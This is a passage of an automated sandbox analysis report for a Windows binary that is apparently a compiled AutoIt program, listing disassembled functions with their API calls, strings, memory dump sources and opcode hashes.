                                                                                                                  • Instruction Fuzzy Hash: 59F0BE32A49211AFD3121BA6FC88DEF3729FF88741F841021F103B10B2EBB49808DB60
                                                                                                                  Function 00DE1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                    • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
                                                                                                                  • __swprintf.LIBCMT ref: 00DE1EA6
                                                                                                                  Strings
                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DE1D49
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                  • API String ID: 2125237772-557222456
                                                                                                                  • Opcode ID: 3d474b15bc02de7380582db228070f44299536d7554d7b27deb44655a3401be3
                                                                                                                  • Instruction ID: b8b7768fc603fa272ea2c60c83e3775c33a4ddce2cd6acfcf9a5971626e4a183
                                                                                                                  • Opcode Fuzzy Hash: 3d474b15bc02de7380582db228070f44299536d7554d7b27deb44655a3401be3
                                                                                                                  • Instruction Fuzzy Hash: 569169712043819FC724FF25C896C6AB7A4EF95700F14491DF995A72A1EB70ED09CBB2
                                                                                                                  Function 00E3AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3B006
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00E3B115
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E3B298
                                                                                                                    • Part of subcall function 00E29DC5: VariantInit.OLEAUT32(00000000), ref: 00E29E05
                                                                                                                    • Part of subcall function 00E29DC5: VariantCopy.OLEAUT32(?,?), ref: 00E29E0E
                                                                                                                    • Part of subcall function 00E29DC5: VariantClear.OLEAUT32(?), ref: 00E29E1A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                  • Opcode ID: 8280f18d92d71fb8c7f1875256c190032570f09b69d3b2271f3e1a15608dc091
                                                                                                                  • Instruction ID: 0e5ba48f0587aba6becb773cb7f311b677d61f7337fc5f260bb68fe185f84ada
                                                                                                                  • Opcode Fuzzy Hash: 8280f18d92d71fb8c7f1875256c190032570f09b69d3b2271f3e1a15608dc091
                                                                                                                  • Instruction Fuzzy Hash: AD918A30608341DFCB10EF25C49599BBBE4EF89704F04596DF99AAB362DB31E905CB62
                                                                                                                  Function 00E25347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
                                                                                                                  • _memset.LIBCMT ref: 00E25438
                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00E25467
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E25513
                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E2553D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                  • Opcode ID: b6e3df82363950113de3317c8520ce269b9957246f706313f3105ad6218d1730
                                                                                                                  • Instruction ID: ae63452a58884059ba0d084e15cb9b54173b3d578a9f469a8b634cf182eb3f04
                                                                                                                  • Opcode Fuzzy Hash: b6e3df82363950113de3317c8520ce269b9957246f706313f3105ad6218d1730
                                                                                                                  • Instruction Fuzzy Hash: 845106325047219BD314EF28EA416BBB7E4EF45358F142529F896F3190DBB0DD448762
                                                                                                                  Function 00E20213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2027B
                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E202B1
                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E202C2
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E20344
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                  • String ID: DllGetClassObject
                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                  • Opcode ID: f67dab01f579b54d96b92d1f8f4ac094fd2337da1fbb1ca191eb06f39f34c48f
                                                                                                                  • Instruction ID: 6556db386bf94ae6abb6f29300e1f41ef206e69ff5a31dfe4666441e811c8ed5
                                                                                                                  • Opcode Fuzzy Hash: f67dab01f579b54d96b92d1f8f4ac094fd2337da1fbb1ca191eb06f39f34c48f
                                                                                                                  • Instruction Fuzzy Hash: 64415D71A04214EFDB05CF54E8C5B9A7BB9EF88314B1490A9E909EF286D7F1D944CBA0
                                                                                                                  Function 00E25007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E25075
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00E25091
                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00E250D7
                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EA1708,00000000), ref: 00E25120
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                  • Opcode ID: cc87ea78e37c95d017058c86e19c87cd1cd356b94d1170ed203cf5eec7c2b3cc
                                                                                                                  • Instruction ID: 0f502ab46ed7e9714e007539d1061ce055bb8cdb12db891eb25596da85ba6bc8
                                                                                                                  • Opcode Fuzzy Hash: cc87ea78e37c95d017058c86e19c87cd1cd356b94d1170ed203cf5eec7c2b3cc
                                                                                                                  • Instruction Fuzzy Hash: 3441CF72205B119FD720DF28ED81B6BB7E4AF85328F045A1EF855A7291D770E814CB62
                                                                                                                  Function 00E40567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00E40587
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharLower
                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                  • API String ID: 2358735015-567219261
                                                                                                                  • Opcode ID: 94835024065f9be5f10883c5bb7f10dc479d1d2f7774d9c8266fe3134e74fbe5
                                                                                                                  • Instruction ID: f6cf420310ba3595cffa8e879880f6b798cbc03838bf5f9215a8d4c4b0d05abf
                                                                                                                  • Opcode Fuzzy Hash: 94835024065f9be5f10883c5bb7f10dc479d1d2f7774d9c8266fe3134e74fbe5
                                                                                                                  • Instruction Fuzzy Hash: AA31AF7060021AAFCF00EF68DC419EEB3B4FF54314B009669E926B76D1DB71E916CBA0
                                                                                                                  Function 00E1B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E1B88E
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E1B8A1
                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E1B8D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                  • Opcode ID: c90a432f0a668c227121ef86f19a6d3e95941a23b6fe65edf1245b2f6af8fe38
                                                                                                                  • Instruction ID: 3ff4a55f6615053aefdcff1c733c6c67c16f43a80e3333b45cc98bb4088417a6
                                                                                                                  • Opcode Fuzzy Hash: c90a432f0a668c227121ef86f19a6d3e95941a23b6fe65edf1245b2f6af8fe38
                                                                                                                  • Instruction Fuzzy Hash: 1521E172A00208BFDB08AB65DC869FE77BDDF05754B105129F125B61E0DBB44D4A9670
                                                                                                                  Function 00E343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E34401
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E34427
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E34457
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E3449E
                                                                                                                    • Part of subcall function 00E35052: GetLastError.KERNEL32(?,?,00E343CC,00000000,00000000,00000001), ref: 00E35067
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                  • Opcode ID: a8c07397917153b8515b949ce5c4df97d1fc3f77d9b5a939a98a00c8ca2758ad
                                                                                                                  • Instruction ID: 6f52c9bab049ff187f6c75046e1ddeba13f70254ae1e4bef769dd906a5279146
                                                                                                                  • Opcode Fuzzy Hash: a8c07397917153b8515b949ce5c4df97d1fc3f77d9b5a939a98a00c8ca2758ad
                                                                                                                  • Instruction Fuzzy Hash: C621B0F2604208BEE7119F55DC88EBB7AECEB48758F10902AF115B6180DA65AD059771
                                                                                                                  Function 00E490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
                                                                                                                    • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
                                                                                                                    • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E4915C
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00E49163
                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E49178
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E49180
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                  • Opcode ID: 558447a63c0389538d3edb939cc3e5ee5fef86e15d50c3154af6cb4dfbb19802
                                                                                                                  • Instruction ID: 112b6bc4380adbcead81c0d80b417d493edcb5791bf1de6ee5f29b12db6d68c9
                                                                                                                  • Opcode Fuzzy Hash: 558447a63c0389538d3edb939cc3e5ee5fef86e15d50c3154af6cb4dfbb19802
                                                                                                                  • Instruction Fuzzy Hash: A521A171A00206BFEF208F65EC85EBB37ADEF993A8F111658F914B2291C775DC41A760
                                                                                                                  Function 00E29568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00E29588
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E295B9
                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00E295CB
                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E29605
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                  • Opcode ID: f08d78c6b31c8fb9ea1bc0f9defc1c8f7122825cd09c853dbf95427bfe5b420b
                                                                                                                  • Instruction ID: 2b2c273ce0afe6295b9524a8d10512f980ccbc4ee77468646b0134cbdc06bcfa
                                                                                                                  • Opcode Fuzzy Hash: f08d78c6b31c8fb9ea1bc0f9defc1c8f7122825cd09c853dbf95427bfe5b420b
                                                                                                                  • Instruction Fuzzy Hash: 1021A170740215AFEB219F25EC04A9E77E4BF48324F206A19F8A1F72E2D770D944CB60
                                                                                                                  Function 00E29634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00E29653
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E29683
                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00E29694
                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E296CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                  • Opcode ID: 4cf9e59c7f6da6d5f70c69c75362fd008a7f845cb51fae0298cc0d1c86ea427a
                                                                                                                  • Instruction ID: 57b9f3814b18840cb96d034f167731a8c78f3b70adf5480c0143f79516d4a6cc
                                                                                                                  • Opcode Fuzzy Hash: 4cf9e59c7f6da6d5f70c69c75362fd008a7f845cb51fae0298cc0d1c86ea427a
                                                                                                                  • Instruction Fuzzy Hash: EB21B6716002259FDB209F69AC44E9E77E8AF45734F202A18F8B1F72D2E7B0D845CB50
                                                                                                                  Function 00E2DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2DB0A
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E2DB5E
                                                                                                                  • __swprintf.LIBCMT ref: 00E2DB77
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E7DC00), ref: 00E2DBB5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                  • String ID: %lu
                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                  • Opcode ID: b4c058677822f34c9ebedcf7b332a8454bd79e09af951916d215183fd33a110a
                                                                                                                  • Instruction ID: deef36cc11f496161b8041b2cf8f0c95bb7baef02376796de3874e6d1b9f563b
                                                                                                                  • Opcode Fuzzy Hash: b4c058677822f34c9ebedcf7b332a8454bd79e09af951916d215183fd33a110a
                                                                                                                  • Instruction Fuzzy Hash: F6217135A00248AFCB10EB65DD85DEEB7F8EF49704B104069F509E7251DBB1EA45CB61
                                                                                                                  Function 00E1C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
